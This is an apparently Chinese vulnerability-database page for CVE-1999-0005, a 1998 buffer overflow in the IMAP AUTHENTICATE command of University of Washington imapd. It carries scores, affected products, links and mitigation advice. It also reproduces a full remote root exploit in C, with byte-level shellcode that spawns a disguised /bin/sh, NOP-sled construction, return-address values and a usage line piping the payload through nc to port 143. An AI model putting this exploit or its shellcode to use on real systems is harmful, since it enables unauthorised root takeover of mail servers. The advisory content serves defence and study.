CVE-1999-0005
CVSS10.0
发布时间 :1998-07-20 00:00:00
修订时间 :2008-09-09 08:33:31
NMCOE    

[原文]Arbitrary command execution via IMAP buffer overflow in authenticate command.


[CNNVD]University of Washington imapd远程缓冲区溢出漏洞(CNNVD-199807-024)

        University of Washington imapd是一种Internet邮件接收协议的开放源码的实现。
        通过身份验证命令中的IMAP缓冲区溢出,执行任意命令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:university_of_washington:imap:10.234
cpe:/a:netscape:messaging_server:3.55Netscape Netscape Messaging Server 3.55

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0005
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0005
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199807-024
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/130
(UNKNOWN)  BID  130
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/177
(UNKNOWN)  SUN  00177

- 漏洞信息

University of Washington imapd远程缓冲区溢出漏洞
危急 其他
1998-07-20 00:00:00 2012-11-28 00:00:00
远程  
        University of Washington imapd是一种Internet邮件接收协议的开放源码的实现。
        通过身份验证命令中的IMAP缓冲区溢出,执行任意命令。

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时停止imapd服务。
        厂商补丁:
        University of Washington
        ------------------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.washington.edu/imap/

- 漏洞信息 (19107)

Netscape Messaging Server 3.55,University of Washington imapd 10.234 Buffer Overflow Vulnerability (EDBID:19107)
linux remote
1998-07-17 Verified
0 Anonymous
N/A [点击下载]
source: http://www.securityfocus.com/bid/130/info

A vulnerability exists in certain imapd implementations that allow an attacker to execute arbitrary code remotely. In certain instances, the code to be executed will be run with root privilege.

Imap supports a command 'AUTHENTICATE' which specifies the type of authentication mechanism to be used to open a mailbox. The value passed to the authenticate command is copied into a buffer of size 1024. The maximum size of this value, however, it 8192 characters. A failure to bound the read value to 1024 results in a buffer overflow.

The code which creates this problem is as follows:

char *mail_auth (char *mechanism,authresponse_t resp,int argc,char *argv[])
{
char tmp[MAILTMPLEN];
AUTHENTICATOR *auth;
/* make upper case copy of mechanism name */
ucase (strcpy (tmp,mechanism));
for (auth = mailauthenticators; auth; auth = auth->next)
if (auth->server && !strcmp (auth->name,tmp))
return (*auth->server) (resp,argc,argv);
return NIL; /* no authenticator found */
}

The 'strcpy' command on the sixth line of code will copy the value of 'mechanism', which is up to 8192 characters in to the 'tmp' buffer, which is only 1024 characters.

All versions of UW imapd up to, and including 10.234 should be considered vulnerable.

/**
*** i386 BSD remote root exploit for UW imapd IMAP 4.1 server
***
*** This is *not* the same bug addressed in CERT Advisory CA-97.09!
***
*** Usage: % (imappy nop esp offset; cat) | nc hostname 143
***
*** where nop is the number of NOP opcodes to place at the start of the
*** exploit buffer (I use 403), esp is the %esp stack pointer value, and
*** offset is the number of bytes to add to esp to calculate your target
*** %eip.
***
*** Demonstration values for UW imapd 10.234 (part of Pine 4.00):
***
*** imappy 403 0xefbfd5e8 100 (BSDI 3.0)
*** imappy 403 0xefbfd4b8 100 (FreeBSD 2.2.5)
***
*** THIS CODE FOR EDUCATIONAL USE ONLY IN AN ETHICAL MANNER
***
*** Cheez Whiz
*** cheezbeast@hotmail.com
***
*** July 16, 1998
**/

#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <string.h>

#define BUFLEN (2*1024)
#define NOP 0x90

char shell[] =
/* 0 */ "\xeb\x34" /* jmp springboard */
/* start: */
/* 2 */ "\x5e" /* popl %esi */
/* 3 */ "\x8d\x1e" /* leal (%esi),%ebx */
/* 5 */ "\x89\x5e\x0b" /* movl %ebx,0xb(%esi) */
/* 8 */ "\x31\xd2" /* xorl %edx,%edx */
/* 10 */ "\x89\x56\x07" /* movl %edx,0x7(%esi) */
/* 13 */ "\x89\x56\x0f" /* movl %edx,0xf(%esi) */
/* 16 */ "\x89\x56\x14" /* movl %edx,0x14(%esi) */
/* 19 */ "\x88\x56\x19" /* movb %dl,0x19(%esi) */
/* 22 */ "\x31\xc0" /* xorl %eax,%eax */
/* 24 */ "\xb0\x7f" /* movb $0x7f,%al */
/* 26 */ "\x20\x46\x01" /* andb %al,0x1(%esi) */
/* 29 */ "\x20\x46\x02" /* andb %al,0x2(%esi) */
/* 32 */ "\x20\x46\x03" /* andb %al,0x3(%esi) */
/* 35 */ "\x20\x46\x05" /* andb %al,0x5(%esi) */
/* 38 */ "\x20\x46\x06" /* andb %al,0x6(%esi) */
/* 41 */ "\xb0\x3b" /* movb $0x3b,%al */
/* 43 */ "\x8d\x4e\x0b" /* leal 0xb(%esi),%ecx */
/* 46 */ "\x89\xca" /* movl %ecx,%edx */
/* 48 */ "\x52" /* pushl %edx */
/* 49 */ "\x51" /* pushl %ecx */
/* 50 */ "\x53" /* pushl %ebx */
/* 51 */ "\x50" /* pushl %eax */
/* 52 */ "\xeb\x18" /* jmp exec */
/* springboard: */
/* 54 */ "\xe8\xc7\xff\xff\xff" /* call start */
/* data: */
/* 59 */ "\x2f\xe2\xe9\xee\x2f\xf3\xe8" /* DATA (disguised /bin/sh) */
/* 66 */ "\x01\x01\x01\x01" /* DATA */
/* 70 */ "\x02\x02\x02\x02" /* DATA */
/* 74 */ "\x03\x03\x03\x03" /* DATA */
/* exec: */
/* 78 */ "\x9a\x04\x04\x04\x04\x07\x04"; /* lcall 0x7,0x0 */

char buf[BUFLEN];
unsigned long int nop, esp;
long int offset;

void
main (int argc, char *argv[])
{
int i;

if (argc < 4) {
printf("usage: %s nop esp offset\n", argv[0]);
return;
}

nop = strtoul(argv[1], NULL, 0);
esp = strtoul(argv[2], NULL, 0);
offset = strtol(argv[3], NULL, 0);

memset(buf, NOP, BUFLEN);
memcpy(buf+nop, shell, strlen(shell));
for (i = nop+strlen(shell); i < BUFLEN - 4; i += 4)
*((int *) &buf[i]) = esp + offset;

printf("* AUTHENTICATE {%d}\r\n", BUFLEN);
for (i = 0; i < BUFLEN; i++)
putchar(buf[i]);
printf("\r\n");

return;
}		

- 漏洞信息

911
UoW imapd AUTHENTICATE Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow exists in the University of Washington IMAP server. The IMAP server fails to validate the argument passed to the AUTHENTICATE command resulting in a stack overflow. With a specially crafted request, an attacker can gain remote root privileges resulting in a loss of integrity.

- 时间线

1998-07-17 Unknow
1998-07-17 Unknow

- 解决方案

Upgrade to version 12.264 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站